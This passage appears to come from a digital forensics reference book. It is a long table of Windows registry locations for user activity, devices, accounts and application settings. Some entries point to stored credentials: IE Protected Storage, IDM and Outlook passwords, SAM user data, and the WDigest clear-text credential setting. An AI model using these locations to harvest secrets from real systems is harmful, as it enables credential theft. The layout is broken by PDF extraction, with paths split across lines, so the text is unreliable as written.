HKEY_USERS\ S-1-5-21-
1757981266-1708537768-
725345543-
X 500\Software\Microsoft\Intern
DAP Context Menu 1 P etExplorer\MenuExt
HKEY_USERS\ S-1-5-21-
1757981266-1708537768-
725345543-
X 500\Software\Microsoft\Intern
DAP Context Menu 2 P etExplorer\MenuExt
X HKEY_USERS\SID\Software\Speed
DAP DL Activity P Bit\Download Accelerator
HKEY_USERS\SID\Software\Speed
Bit\Download
X Accelerator\FileList\(Site/Se
DAP Download Dir P rver)\DownloadDir
HKEY_USERS\SID\Software\Speed
X Bit\Download
DAP Download URLs P Accelerator\HistoryCombo
HKEY_USERS\SID\Software\Speed
X Bit\Download
DAP FileList P Accelerator\FileList
HKEY_USERS\SID\Software\Speed
Bit\Download
X Accelerator\FileList\HostsDat
DAP Host Data P a
HKEY_USERS\SID\Software\Speed
Bit\Download
X Accelerator\FileList\(Site/Se
DAP Ignored Sites P rver)\BlackList
HKEY_LOCAL_MACHINE\SOFTWARE\M
icrosoft\Windows\CurrentVersi
X on\Uninstall\Download
DAP Install/V/Path P Accelerator Plus
HKEY_USERS\SID\Software\Speed
Bit\Download
X Accelerator\FileList\(Site/Se
DAP Protected URLs P rver)
HKEY_USERS\SID\Software\Speed
X Bit\Download
DAP Proxy Data P Accelerator\Proxy
HKEY_USERS\SID\Software\Speed
X Bit\Download
DAP Searched Words P Accelerator\SearchTab
X HKEY_USERS\SID\Software\Speed
DAP Unique File ID P Bit\Download

381
 Accelerator\FileList\(Unique
File ID)
HKEY_USERS\SID\Software\Speed
X Bit\Download
DAP User Credentials P Accelerator\UserInfo
1 SOFTWARE\Microsoft\Dfrg\Stati
Defrag Last Run Time 7 8 0 stics\ Volume/ LastRunTime
HKEY_LOCAL_MACHINE\SYSTEM\Cur
Disables (or stores rentControlSet\Control\Securi
if 1) clear-text tyProviders\WDigest\UseLogonC
creds 8 redential
Disk Class Filter 1 SYSTEM\ControlSet001\services
Driver stdcfltn 0 \ stdcfltn
X 1 SYSTEM\ControlSet001\Enum\ DI
Display Enumeration P 7 8 0 SPLAY\\
Display Monitor SYSTEM\ControlSet###\Enum\Dis
Settings 7 play
X 1 SYSTEM\ControlSet###\Enum\Dis
Display Monitors P 7 8 0 play
SYSTEM\ControlSet###\Control\
DLLs Loaded at Bootup 7 SessionManager\KnownDLLs
X 1 SYSTEM\ControlSet###\Control\
DLLs Loaded at Bootup P 7 8 0 SessionManager\KnownDLLs
[Link]\Software\Microsoft
Drives Mounted by X 1 \ Windows\ CurrentVersion\Exp
User P 7 8 0 lorer\ MountPoints2\
SYSTEM\\ControlSet###\Service
X s\ DMIO\Boot Info\Primary
Dynamic Disk P 7 Disk Group
SYSTEM\ControlSet###\Services
Dynamic Disk \DMIO\Boot Info\Primary Disk
Identification 7 Group
[Link]\Local
Settings\Software\ Microsoft\
Windows\CurrentVersion\ AppCo
ntainer\Storage\microsoft.
Edge Browser microsoftedge_8wekyb3d8bbwe\M
Favorites, Edge 1 icrosoftEdge\FavOrder\Favorit
Favorites 0 es\/ Order
[Link] \Local
Settings\Software\ Microsoft\
Windows\CurrentVersion\ AppCo
ntainer\Storage\microsoft.
microsoftedge_8wekyb3d8bbwe\M
Edge History Days to 1 icrosoftEdge\InternetSettings
Keep 0 \ Url History / DaysToKeep
[Link] \ Local
Settings\Software\ Microsoft\
1 Windows\CurrentVersion\ App
Edge Typed URLs 0 Container\Storage\microsoft.

382
 microsoftedge_8wekyb3d8bbwe\
MicrosoftEdge\TypedURLs
[Link] \ Local
Settings\Software\Microsoft\
Windows\CurrentVersion\App
Container\Storage\microsoft.
1 microsoftedge_8wekyb3d8bbwe\M
Edge Typed URLs Time 0 icrosoftEdge\TypedURLsTime
[Link] \ Local
Settings\Software\ Microsoft\
Windows\CurrentVersion\ App
Container\Storage\microsoft.
microsoftedge_8wekyb3d8bbwe\M
Edge Typed URLs Visit 1 icrosoftEdge\TypedURLsVisitCo
Count 0 unt
[Link]\Software\Microsoft
\ Windows
X 1 NT\CurrentVersion\EFS\ Curren
EFS P 7 8 0 tKeys
[Link]\Software\Microsoft
EFS Attribute in File 1 \ Windows\ CurrentVersion\Exp
Explorer Green Color 0 lorer\ Advanced
SYSTSEM\ControlSet###\Control
1 \ FileSystem /
Encrypted Page File 7 8 0 NtfsEncryptPagingFile
Event Log SYSTEM\ControlSet###\Services
Restrictions 7 \EventLog\Application
SYSTEM\ControlSet###\Services
Event Log X 1 \ EventLog\Application /
Restrictions P 7 8 0 RestrictGuest Access
[Link]\LocalSettings\So
ftware\Microsoft\Windows\Curr
entVersion\AppContainer\Stora
ge\microsoft.microsoftedge_8w
1 ekyb3d8bbwe\MicrosoftEdge\Fav
Favorites 0 Order\
[Link]\Local
Settings\Software\ Microsoft\
Windows\CurrentVersion\ AppMo
File Access Windows 1 del\SystemAppData\\PersistedS
Apps 0 torage ItemTable\ManagedByApp
[Link]\Local
Settings\Software\ Microsoft\
Windows\CurrentVersion\ AppMo
File Associations for del\Repository\Packages\\App\
Immersive 1 Capabilities\ FileAssociation
Apps/Windows Apps 8 0 s
File Extension X 1 [Link]\Software\Microsoft
Association Apps MRU P 7 8 0 \ Windows\ CurrentVersion\Exp

383
 lorer\ FileExts\.\OpenWithLis
t
[Link]\Software\Microsoft
File Extension X 1 \ Windows\ CurrentVersion\Exp
Associations P 7 8 0 lorer\FileExts\.
File Extension X 1
Associations Global P 7 8 0 SOFTWARE\Classes\.ext
[Link]\Software\Microsoft
\ Windows\CurrentVersion\Expl
File Extensions X 1 orer\ FileExts\./OpenWithProg
Program Association P 7 8 0 ids
[Link]\Software\Microsoft
1 \ Windows\CurrentVersion\File
File History 8 0 History
SOFTWARE\Microsoft\Windows\Cu
rrent
File History Home 1 Version\FileHistory\HomeGroup
Group Settings 8 0 \Target
[Link]\Software\Microsoft
File History Last 1 \ Windows\CurrentVersion\File
Backup Time 8 0 History/ ProtectedUpToTime
File History User(s) 1 SYSTEM\ControlSet###\Services
Initiating 8 0 \fhsvc\ Parameters\Configs
SYSTEM\ControlSet###\Services
\ SharedAccess\Parameters\ Fi
X 1 rewall Policy\StandardProfile
Firewall Enabled P 7 8 0 / EnableProfile
SYSTEM\ControlSet###\Services
\SharedAccess\Parameters\Fire
wallPolicy\StandardProfile\En
Firewall On or Off 7 ableFirewall
Floppy Disk X SYSTEM\ControlSet###\Enum\FDC
Information P V \
SOFTWARE\Microsoft\Windows\Cu
rrent
1 Version\Explorer\FolderDescri
Folder Descriptions 7 8 0 ptions\
[Link]\Software\Microsoft
\ Windows\ CurrentVersion\ Ex
Folders Stream MRUs plorer\StreamMRU
[Link]\Software\Microsoft
FTP 7 \FTP\Accounts\
X [Link]\Software\Microsoft
FTP P 7 \FTP\ Accounts\
HKEY_CURRENT_USER\Software\Mi
crosoft\Windows\CurrentVersio
X n\Explorer\ComDlg32\OpenSaveP
General Open/Saved P 7 idlMRU

384
 HKEY_CURRENT_USER\Software\Mi
X crosoft\Windows\CurrentVersio
General Recent Docs P n\Explorer\Advanced
HKEY_CURRENT_USER\Software\Mi
X crosoft\Windows\CurrentVersio
General Recent Files P n\Explorer\Advanced
HKEY_LOCAL_MACHINE\SYSTEM\Cur
General USB Devices 7 rentControlSet\Enum\USBSTOR
[Link]\Software\Google\ U
pdate\ClientState\{8A69D345-
Google Chrome Last D564-463c-AFF1-A69D9Ec-AFF1-
Browser Run Time A69D9E530F96} / lastrun
[Link]\Software\Google\ C
Google Chrome Version hrome\BLBeacon
[Link]\Software\Google\Na
Google Client History 7 vClient\1.1\History
[Link]\Software\Google\ N
Google Client History avClient\1.1\History
[Link]\Software\Google\ G
Google Update oogle Toolbar\GoogleUpdate /
Date/Time InstallTimestamp
SOFTWARE\Microsoft\Windows\ C
X 1 urrentVersion\Group
Group Memberships P 7 8 0 Policy\ GroupMembership
X 1 SOFTWARE\Microsoft\Windows\ C
Group Memberships P 7 8 0 urrentVersion\Group Policy\
X 1 SAM\SAM\Domains\Builtin\Alias
Group Names - Default P 7 8 0 es\ Names
X 1 SAM\SAM\Domains\Builtin\Alias
Groups - Default P 7 8 0 es\
Groups Names User or X 1 SAM\SAM\Domains\Account\Alias
App Defined P 7 8 0 es\ Names
Groups Names User or X 1 SAM\SAM\Domains\Account\Alias
App Defined P 7 8 0 es\
[Link]\SOFTWARE\Microsoft
\Windows\CurrentVersion\Inter
History - Days to 1 net Settings\Url History
Keep 0 /DaysToKeep
[Link]\SOFTWARE\LocalSe
ttings\Software\Microsoft\Win
dows\CurrentVersion\AppContai
ner\ Storage\[Link]
oftedge_8wekyb3d8bbwe\Microso
1 ftEdge\InternetSettings\Url
History days to keep 0 History /DaysToKeep
X 1 SYSTEM\ControlSet###\Control\
Hive List Paths P 7 8 0 hivelist
SYSTEM\ControlSet###\services
\HomeGroupProvider\ServiceDat
Home Group 7 a

385
 SYSTEM\ControlSet###\Services
1 \Home
Home Group 7 8 0 GroupProvider\ServiceData\
[Link]\SOFTWARE\Microsoft
1 \ Windows\CurrentVersion\Home
Home Group Host 7 8 0 Group\ UIStatusCache
1 SOFTWARE\Microsoft\Windows\ C
Home Group ID GUID 7 8 0 urrentVersion\HomeGroup\HME\
SYSTEM\ControlSet###\Services
1 \ HomeGroupProvider\ServiceDa
Home Group Info 7 8 0 ta\
1 SOFTWARE\Microsoft\Windows\ C
Home Group Initiated 7 8 0 urrentVersion\HomeGroup\HME
SYSTEM\ControlSet###\Services
\Home
1 GroupProvider\ServiceData\\ M
Home Group Members 7 8 0 embers\
SOFTWARE\Microsoft\Windows\ C
Home Group Members 1 urrentVersion\HomeGroup\HME\\
MAC Address(es) 7 8 0 Members
SOFTWARE\Microsoft\Windows\Cu
rrent
Home Group Network 1 Version\HomeGroup\NetworkLoca
Locations Home 7 8 0 tions\ Home
SOFTWARE\Microsoft\Windows\Cu
rrent
Home Group Network 1 Version\HomeGroup\NetworkLoca
Locations Work 7 8 0 tions\ Work
SOFTWARE\Microsoft\Windows\ C
Home Group Sharing 1 urrentVersion\HomeGroup\HME\\
Preferences 7 8 0 SharingPreferences\
SOFTWARE\Microsoft\Windows\ C
Home Group Sharing 1 urrentVersion\HomeGroup\ Shar
Preferences 7 8 0 ingPreferences\\
Human Interface
Devices 7 SYSTEM\ControlSet###\Enum\HID
Human Interface X 1
Devices P 7 8 0 SYSTEM\ControlSet###\Enum\HID
[Link]\Software\Mirabilis
ICQ \ICQ\*
ICQ Information SOFTWARE\Mirabilis\ICQ\Owner
[Link]\Software\Mirabilis
ICQ Last User \ICQ\ Owners - LastOwner
[Link]\Software\Mirabilis
ICQ Nickname \ICQ\ Owners\UIN - Name
[Link]\Software\Mirabilis
ICQ Registered Users \ICQ\ Owners\UIN
IDE Device SYSTEM\ControlSet###\Enum\IDE
Information 7 \

386
IDE Device X 1 SYSTEM\ControlSet###\Enum\IDE
Information P 7 8 0 \
X 1 SYSTEM\ControlSet001\Enum\ ID
IDE Enumeration P 7 8 0 E\\
[Link]\LocalState\HKEY_
CURRENT_USER\Software\Microso
1 ft\Office\16.0\Common\Identit
Identity 0 y\Identities\
1 NTUSER\SOFTWARE\Microsoft\15.
Identity Live Account 0 0\Common\Identity\Identities\
X HKEY_CURRENT_USER\Software\Do
IDM Incomplete DLs P wnloadManager\Queue
X HKEY_CURRENT_USER\Software\Do
IDM Install, Proxy P wnloadManager
KEY_LOCAL_MACHINE\SOFTWARE\Mi
crosoft\Windows\CurrentVersio
X n\Uninstall\Internet Download
IDM Installation P Manager
HKEY_CURRENT_USER\Software\Do
X wnloadManager\GrabberSts\Proj
IDM Offline Browsing P ects
X HKEY_CURRENT_USER\Software\Do
IDM Passwords P wnloadManager\Passwords\(URL)
X HKEY_CURRENT_USER\Software\Do
IDM Total DL Count P wnloadManager\maxID
[Link]\Software\Microsoft
\Protected Storage\System
Provider\SID\Internet
IE 6 Auto Logon and Explorer\Internet Explorer\-
password 7 URL: StringData
[Link]\Software\Microsoft
\Internet
IE 6 Clear Browser Explorer\Privacy\ClearBrowser
History 7 HistoryOnExit
IE 6 Default Download [Link]\Software\Microsoft
Directory 7 \Internet Explorer
[Link]\Software\Microsoft
\Windows\CurrentVersion\Explo
IE 6 Favorites List 7 rer\MenuOrder\Favorites\
[Link]\Software\Microsoft
IE 6 Settings 7 \Internet Explorer\Main
[Link]\Software\Microsoft
IE 6 Typed URLs 7 \Internet Explorer\Typed URLs
[Link]\Software\Microsoft
IE Auto Complete Form \ Protected Storage System
Data Provider
[Link]\Software\Microsoft
\ Protected Storage System
IE Auto Logon and Provider\ SID\Internet
Password Explorer\Internet Explorer

387
IE Cleared Browser [Link]\Software\Microsoft
History on Exit \ Internet Explorer\ Privacy
on/off / ClearBrowserHistoryOnExit
IE Default Download [Link]\Software\Microsoft
Directory \ Internet Explorer
[Link]\Software\Microsoft
\ Windows\CurrentVersion\Expl
X 1 orer\ MenuOrder\ Favorites /
IE Favorites List P 7 8 0 Order
[Link]\Software\Microsoft
\ Windows\ CurrentVersion\Int
ernet
X Settings\ 5.0\Cache\Extensibl
IE History Status P 7 8 e Cache\
[Link]\Software\Microsoft
\ Internet
IE IntelliForms Explorer\ IntelliForms
IE Preferences, IE [Link]\Software\Microsoft
Settings \ Internet Explorer\ Main
HKEY_CURRENT_USER\SOFTWARE\Mi
X crosoft\ProtectedStorageSyste
IE Protected Storage P mProvider
[Link]\Software\Microsoft
\Protected Storage System
Provider\SID\Internet
Explorer\Internet Explorer -
IE Search Terms q:StringIndex
[Link]\Software\Microsoft
IE Typed URLs \Internet Explorer\TypedURLs
[Link]\Software\Microsoft
\ Internet
IE Typed URLs Time Explorer\TypedURLsTime
[Link]\Software\Microsoft
\ Windows\CurrentVersion\Inte
IE URL History Days rnet Settings\UrlHistory /
to Keep DaysToKeep
[Link]\Software\Microsoft
\Protected Storage System
Provider\SID\Internet
IE Web Form Data Explorer\Internet Explorer -
HKEY_CURRENT_USER\Software\Mi
crosoft\Internet
1 Explorer\IntelliForms\Storage
IE/Edge Auto Passwd 0 2
If hidden from HKCU\Software\Microsoft\Windo
timeline view, key is 1 ws\CurrentVersion\ActivityDat
present 0 aModel\ActivityAccountFilter\
[Link]\Software\Microsoft
\ MessengerService\ListCache\
IM Contact List .NET Messenger Service

388
 [Link]\Software\Microsoft
\ MSNMessenger\FileSharing -
IM File Sharing Autoshare
[Link]\Software\Microsoft
\ Messenger Service -
IM File Transfers FtReceiveFolder
[Link]\Software\Microsoft
\ MSNMessenger\-
IM File Transfers FTReceiveFolder
[Link]\Software\Microsoft
\ MessengerService\ListCache\
.NET Messenger Service -
IM Last User IdentityName
[Link]\Software\Microsoft
\MSN
Messenger\PerPassportSettings
\ ##########\-
IM Logging Enabled MessageLoggingEnabled
[Link]\Software\Microsoft
\MSN
Messenger\PerPassportSettings
\ ##########\- MessageLog
IM Message History Path
[Link]\Software\Microsoft
MessengerService\ ListCache\.
IM MSN Messenger NET MessengerService\*
[Link]\Software\Microsoft
\ Messenger Service -
IM Saved Contact List ContactListPath
[Link]\Software\Yahoo\Pag
er\ IMVironments (global
IMV Usage value)
[Link]\Software\Yahoo\Pa
ger\ profiles\screen
IMVs MRU list name\IMVironments
SOFTWARE\Microsoft\Windows
Index Locations for 1 Search\Gather\Windows\SystemI
local searches 7 8 0 ndex\StartPages\#> /URL
SOFTWARE\Microsoft\Window
Search\ CrawlScopeManager\ Wi
1 ndows\ SystemIndex\ WorkingSe
Indexed Folders 7 8 0 tRules\#>/ URL
X 1 SOFTWARE\Microsoft\Windows\ C
Installed Application P 7 8 0 urrentVersion\App Paths\
Installed X 1
Applications P 7 8 0 SOFTWARE\
Installed 1
Applications 7 8 0 SOFTWARE\Wow6432Node\

389
 SOFTWARE\Wow6432Node\Microsof
Installed 1 t\ Windows\CurrentVersion\Sha
Applications 7 8 0 redDLLs
HKEY_LOCAL_
MACHINE\SOFTWARE\Microsoft\Wi
ndoWs\CurrentVersion\(AppPath
Installed Apps s)
Installed Default X 1 SOFTWARE\Clients\StartMenuInt
Internet Browsers P 7 8 0 ernet / default
Installed Internet X 1 SOFTWARE\Clients\StartMenuInt
Browser P 7 8 0 ernet\
SOFTWARE\Software\Microsoft\
Windows\CurrentVersion\Appx\A
Installed Metro Apps 1 ppxAll
- Per Computer 8 0 UserStore\Applications\
SOFTWARE\Software\Microsoft\
Installed Metro Apps 1 Windows\CurrentVersion\Appx\A
Per User 8 0 ppxAllU serS tore\\
SOFTWARE\Microsoft\Windows
Installed Printers NT\CurrentVersion\Print\Print
Properties 7 ers\
[Link]\Local
Settings\Software\ Microsoft\
Installed Windows 1 Windows\CurrentVersion\ AppCo
Apps 8 0 ntainer\Storage
SYSTEM\ControlSet001\Control\
1 DeviceClasses\ {10497b1b-
Interface class GUID 7 8 0 ba51- 44e5-8318-a65c837b6661}
HKEY_LOCAL_MACHINE\Software\M
Internet Explorer 1 icrosoft\Internet Explorer
HKEY_CURRENT_USER\Software\Mi
crosoft\InternetExplorer\Type
Internet Explorer 2 7 dUrls
1 SYSTEM\ControlSet001\Enum\USB
iPhone, iPad Mounting 8 0 \
[Link]\Software\Microsoft
\Windows\CurrentVersion\Explo
rer\[Taskband Favorites and
Jump List on Taskbar 7 FavoritesResolve]
[Link]\Software\Microsoft
\ Windows\ CurrentVersion\Exp
1 lorer\ Taskband / Favorites
Jump List on Taskbar 7 8 0 and FavoritesResolve
HKCU\Software\Microsoft\Windo
ws\CurrentVersion\Explorer\Ad
Jumplist Settings vanced\
Kazaa [Link]\Software\Kazaa\*
X HKEY_USERS\USER_HDD003_A\Soft
KaZaA Credentials P ware\KAZAA\UserDetails

390
 HKLM\SOFTWARE\[Wow6432Node]\L
LANDesk softmon ANDesk\ManagementSuite\WinCli
utility monitors ent\SoftwareMonitoring\Monito
application execution rLog\
SYSTEM\ControlSet###\Control\
Last Accessed Date X 1 FileSystem\NtfsDisableLastAcc
and Time setting P 7 8 0 ess Update Value
1 SOFTWARE\Microsoft\Dfrg\Stati
Last Defrag 0 stics\Volume
SAM\Domains\Account\Users\F
Last Failed Login 7 Key
SOFTWARE\Microsoft\Windows\ C
1 urrentVersion\Authentication\
Last Logged on User 7 8 0 LogonUI
SAM\Domains\Account\Users\F
Last Logon Time 7 Key
[Link]\Software\Microsoft
\Windows\CurrentVersion\Theme
Last Theme 7 s\Last Theme
Last Time Password SAM\Domains\Account\Users\F
Changed 7 Key
[Link]\Software\Microsoft
X \Windows\CurrentVersion\Explo
Last Visited MRU P rer\ComDlg32\LastVisitedMRU
[Link]\Software\Microsoft
\Windows\CurrentVersion\Explo
1 rer\ComDlg32\LastVisitedPidlM
Last Visited MRU 7 8 0 RU
[Link]\Software\Microsoft
X \Windows\CurrentVersion\Explo
Last-Visited MRU P rer\ComDlg32\ LastVisitedMRU
[Link]\Software\Microsoft
\Windows\CurrentVersion\Explo
1 rer\ComDlg32\LastVisitedPidlM
Last-Visited MRU 7 8 0 RU
Links a
ConnectedDevicePlatfo
rm PlatformDeviceId HKCU\Software\Microsoft\Windo
to the name, type, 1 ws\CurrentVersion\TaskFlow\De
etc of the device 0 viceCache
[Link]\SOFTWARE\Microsoft
1 \Office\15.0\Common\Identity\
Live Account ID 0 Identities\_LiveId
[Link]\SOFTWARE\Microsoft
1 \IdentityCRL\UserExtendedProp
Live Account ID 0 erties\/ cid
[Link]\SOFTWARE\Microsoft
1 \AuthCookies\Live\Default\CAW
Live Account ID 0 / Id

391
Local Group List by
RID 7 SAM\Domains\Builtin\Aliases\
SAM\Domains\Builtin\Aliases\N
Local Group Names 7 ames
Local Groups SAM\Domains\Builtin\Aliases\N
Identifiers 7 ames
[Link]\Software\Microsoft
\ Windows\CurrentVersion\Expl
Local Searches from orer\ SearchHistory\Microsoft
Search Charm .Windows. FileSearch App
Local Settings [Link]
X 1 SAM\SAM\Domains\Account\Users
Local User Names P 7 8 0 \ Names
Local User Security SAM\Domains\Account\Users\Nam
Identifiers 7 es
X 1 SOFTWARE\\Microsoft\Windows
Logged In Winlogon P 7 8 0 NT\ CurrentVersion\Winlogon
SOFTWARE\\Microsoft\Windows\
CurrentVersion\Policies\Syste
Logon Banner Caption X 1 m / LegalNoticeCaption and
and Message P 8 0 LegalNoticeText
SOFTWARE\Microsoft\Windows\Cu
rrentVersion\Policies\System\
Logon Banner Message 7 LegalNoticeText
SOFTWARE\Microsoft\Windows\Cu
rrentVersion\Policies\System\
Logon Banner Title 7 LegalNoticeCaption
LPT Device SYSTEM\ControlSet###\Enum\LPT
Information 7 ENUM\
LPT Device X 1 SYSTEM\ControlSet###\Enum\ LP
Information P 7 8 0 TENUM\
X 1 SYSTEM\ControlSet001\Enum\ LP
LPTENUM Enumeration P 7 8 0 TENUM\\
Machine SID Location 7 SAM\Domains\Account/V
X 1
Machine SID Location P 7 8 0 SAM\SAM\Domains\Account / V
[Link]\Software\Microsoft
X \ Windows\CurrentVersion\Expl
Map Network Drive MRU P 7 orer\Map Network Drive MRU
[Link]\Software\Microsoft
Media Player 10 \MediaPlayer\Player\RecentFil
Recent List 7 eList
[Link]\Software\Microsoft
Media Player Recent X \ MediaPlayer\Player\RecentFi
List P leList
Memory Saved During X 1 SYSTEM\ControlSet###\Control\
Crash P 7 8 0 CrashControl / DumpFile
SYSTEM\ControlSet###\Control\
Memory Saved During X 1 CrashControl /
Crash Enabled P 7 8 0 CrashDumpEnabled

392
Memory Saved Path SYSTEM\ControlSet###\Control\
During Crash 7 CrashControl\DumpFile
Memory Saved While SYSTEM\ControlSet###\Control\
Crash Detail 7 CrashControl\CrashDumpEnabled
X HKEY_USERS\Software\Microsoft
Messenger Contacts P \InternetExplorer\TypedUrls
Microsoft Access 2007 [Link]\Software\Microsoft
MRU 7 \Office\12.0\Access\Settings
Microsoft Access 2007 [Link]\Software\Microsoft
MRU Date 7 \Office\12.0\Access\Settings
Monitors Currently 1 SYSTEM\ControlSet001\services
Attached 8 0 \ monitor\Enum
X 1
Mounted Devices P 7 8 0 SYSTEM\MountedDevices
X 1
Mounted Devices P 7 8 0 SYSTEM\MountedDevices
NTUSER\SOFTWARE\Microsoft\Off
1 ice\15.0\Word\User
MRU Live Account 0 MRU\LiveId#>\File MRU
1 NTUSER\SOFTWARE\Microsoft\Off
MRU Non Live Account 0 ice\15.0\Word\File MRU
[Link]\Software\Microsoft
\Windows\CurrentVersions\Expl
MRUs Common Dialog 7 orer\ComDlg32
HKEY_USERS\(SID)\Software\Bit
Torrent\(BitTorrent Client
mTorrent Build 7 Name)\
HKEY_CURRENT_USER\(SID)\Softw
are\Classes\.btsearch\:
mTorrent File Types 7 "mTorrent"
HKEY_USERS\(SID)\Software\Cla
sses\Applications\[Link]
mTorrent Install Path 7 e\shell\open\command
[Link]\Local
1 Settings\Software\ Microsoft\
MuiCache Post Vista 7 8 0 Windows\Shell\MuiCache
1 [Link]\Local
MuiCache Post Vista 7 8 0 Settings\MuiCache\#\ 52C64B7E
[Link]\Software\Microsoft
MUICache Vista \ Windows\Shell\MUICache
[Link]\Software\Microsoft
X \ Windows\ShellNoRoam\MUICach
MuiCache XP P e
[Link]\Software\Microsoft
Network - Computer X \ Windows\CurrentVersion\Expl
Description P orer\ ComputerDescriptions
[Link]\Software\Microsoft
Network - Mapped X \ Windows\CurrentVersion\Expl
Network Drive MRU P orer\ Map Network Drive MRU

393
 SOFTWARE\Microsoft\Windows
X 1 NT\ CurrentVersion\ NetworkCa
Network Cards P 7 8 0 rds\#
SOFTWARE\Microsoft\Windows
1 NT\CurrentVersion\NetworkList
Network History 7 8 0 \Signatures\Unmanaged
SOFTWARE\Microsoft\Windows
1 NT\CurrentVersion\NetworkList
Network History 7 8 0 \Signatures\Managed
SOFTWARE\Microsoft\Windows
1 NT\CurrentVersion\NetworkList
Network History 7 8 0 \Nla\Cach
[Link]\Software\Microsoft
Network Workgroup \Windows\CurrentVersion\Explo
Crawler 7 rer\WorkgroupCrawler\Shares
[Link]\Software\Microsoft
Network Workgroup X \ Windows\CurrentVersion\Expl
Crawler P orer\ WorkgroupCrawler\Shares
[Link]\Software\Nikon\ Ni
Nikon View Photo konViewEditor\6.0\Recent File
Editor MRU List
NTUSER Info HKEY_USERS\
SYSTEM\ControlSet###\Control\
Session
Number of Processors Manager\Environment\NUMBER_OF
in System 7 _PROCESSORS
SYSTEM\ControlSet###\Control\
Number of Processors X 1 Session Manager\Environment /
in System P 7 8 0 NUMBER_OF_PROCESSORS
Office Access 2007 [Link]\Software\Microsoft
MRU \Office\12.0\Access\ Settings
Office Access 2007 [Link]\Software\Microsoft
MRU Dates \Office\12.0\Access\Settings
[Link]\Software\Microsoft
Office Access MRU \Office\\\Access\File MRU
[Link]\Software\Microsoft
\Office\\ Common\Open
Find\ Microsoft Office
Office Access Recent Access\Settings\File New
Databases Database\File Name MRU
[Link]\Software\Microsoft
Office Access Trusted \Office\\Access\Security\Trus
Documents RU ted Documents\TrustRecords
[Link]\Software\Microsoft
Office Access Trusted \ Office\Access\Security\ Tru
Locations MRU sted Locations\Location2
[Link]\Software\Microsoft
Office Excel Autosave \ Office\ver#\Excel\ Resilien
(File Recovery) cy\ Document Recovery\

394
 [Link]\Software\Microsoft
Office Excel MRU \ Office\\Excel\File MRU
[Link]\Software\Microsoft
Office Excel MRU Live \ Office\\Excel\User
Account MRU\LiveId_\File MRU
Office Excel Place [Link]\Software\Microsoft
MRU \ Office\\Excel\Place MRU
[Link]\Software\Microsoft
Office Excel Place \ Office\\Excel\User
MRU Live Account MRU\LiveId_\Place MRU
[Link]\Software\Microsoft
\office\\Common\Open
Find\ Microsoft Office
Office Excel Recent Excel\Settings\ Save As\File
Spreadsheets Name MRU
[Link]\Software\Microsoft
Office Excel Trusted \ Office\\Excel\Security\Trus
Documents MRU ted Documents
[Link]\Software\Microsoft
Office Excel Trusted \ Office\\Excel\Security\Trus
Locations MRU ted Locations
Office PowerPoint [Link]\Software\Microsoft
Autosave (File \ Office\\ PowerPoint\Resilie
Recovery) ncy\ DocumentRecovery\
[Link]\Software\Microsoft
\ Office\ver#\PowerPoint\ Fil
Office PowerPoint MRU eMRU
[Link]\Software\Microsoft
Office PowerPoint MRU \ Office\\PowerPoint\User
Live Account MRU\ LiveId_\File MRU
[Link]\Software\Microsoft
Office PowerPoint \ Office\\PowerPoint \Place
Place MRU MRU
Office PowerPoint [Link]\Software\Microsoft
Place MRU Live \ Office\\PowerPoint\User
Account MRU\ LiveId_\Place MRU
[Link]\Software\Microsoft
\ office\ver#\ Common\Open
Find\ Microsoft Office
Office PowerPoint PowerPoint\Settings\ Save
Recent PPTs As\File Name MRU
[Link]\Software\Microsoft
\ Office\\PowerPoint\Security
Office PowerPoint \ Trusted
Trusted Documents MRU Documents\TrustRecords
[Link]\Software\Microsoft
Office PowerPoint \ Office\\PowerPoint\Security
Trusted Locations MRU \ Trusted Locations\Location#
[Link]\Software\Microsoft
Office Publisher MRU \ Office\\Publisher\File MRU

395
 [Link]\Software\Microsoft
\ office\\ Common\Open
Find\ Microsoft Office
Office Publisher Publisher\Settings\ Save
Recent Documents As\File Name MRU
[Link]\Software\Microsoft
Office Word Autosave \ Office\\Word\Resiliency\ Do
(File Recovery) cument Recovery\
[Link]\Software\Microsoft
Office Word MRU \ Office\\Word\File MRU
[Link]\Software\Microsoft
Office Word MRU Live \ Office\\Word\User
Account MRU\ LiveId_\File MRU
[Link]\Software\Microsoft
Office Word OneDrive \ Office\\Common\Roaming\ Ide
Synch Roaming 1 ntities\Settings\1133\\ ListI
Identities 0 tems\\
[Link]\Software\Microsoft
Office Word Place MRU \ Office\\Word\Place MRU
[Link]\Software\Microsoft
Office Word Place MRU \ Office\\Word\User
Live Account MRU\ LiveId_\Place MRU
[Link]\Software\Microsoft
Office Word Reading \ Office\\Word\Reading
Locations Locations\Document#
[Link]\Software\Microsoft
\ office\\ Common\Open
Find\ Microsoft
Office Word Recent Office\Word\Settings\Save
Docs As\File Name MRU
[Link]\Software\Microsoft
Office Word Trusted \Office\\Word\Security\Truste
Documents MRU d Documents
[Link]\Software\Microsoft
Office Word Trusted \ Office\14.0\Word\Security\T
Locations MRU rusted Locations\Location#
[Link]\Software\Microsoft
Office Word User Info \ office\\Common\UserInfo
1 [Link]\SOFTWARE\Microsoft
OneDrive App Info 0 \ OneDrive
[Link]\SOFTWARE\Microsoft
OneDrive User ID and 1 \ AuthCookies\Live\Default\CA
Login URL 0 W
[Link]\SOFTWARE\Microsoft
OneDrive User ID 1 \ IdentityCRL\UserExtendedPro
Associated with User 0 perties\/ cid
[Link]\SOFTWARE\Microsoft
OneDrive User ID, 1 \ Office\\Common\Identity\Ide
Live ID 0 ntities\_LiveId

396
 [Link]\LocalState\ HKEY
_CURRENT_USER\Software\ Micro
OneNote User 1 soft\Office\16.0\Common\ Iden
Information 0 tity\Identities\_LiveId
[Link]\Software\Microsoft
\Windows\CurrentVersion\Explo
Open/Save MRU rer\ComDlg32\OpenSaveMRU
[Link]\Software\Microsoft
1 \Windows\CurrentVersion\Explo
Open/Save MRU 7 8 0 rer\ComDlg32\OpenSavePIDlMRU
[Link]\Software\Microsoft
X \Windows\CurrentVersion\Explo
Open/Save MRU P rer\ComDlg32\OpenSaveMRU
[Link]\Software\Microsoft
\Protected Storage
SystemProvider\SID\Identifica
Outlook 2007 Account tion\INETCOMM Server
Passwords 7 Passwords
[Link]\Software\Microsoft
\office\version\Common\Open
Find\Microsoft Office
Outlook 2007 Recent Outlook\Settings\Save
Attachments 7 Attachment\File Name MRU
[Link]\Software\Microsoft
Outlook 2007 Temp \Office\version\Outlook\Secur
file location 7 ity
[Link]\Software\Microsoft
\ Protected Storage System
Outlook Account Provider\SID\ Identification\
Passwords INETCOMM Server Passwords
HKEY_LOCAL_MACHINE\Software\M
X icrosoft\Internet Account
Outlook Accounts P Manager
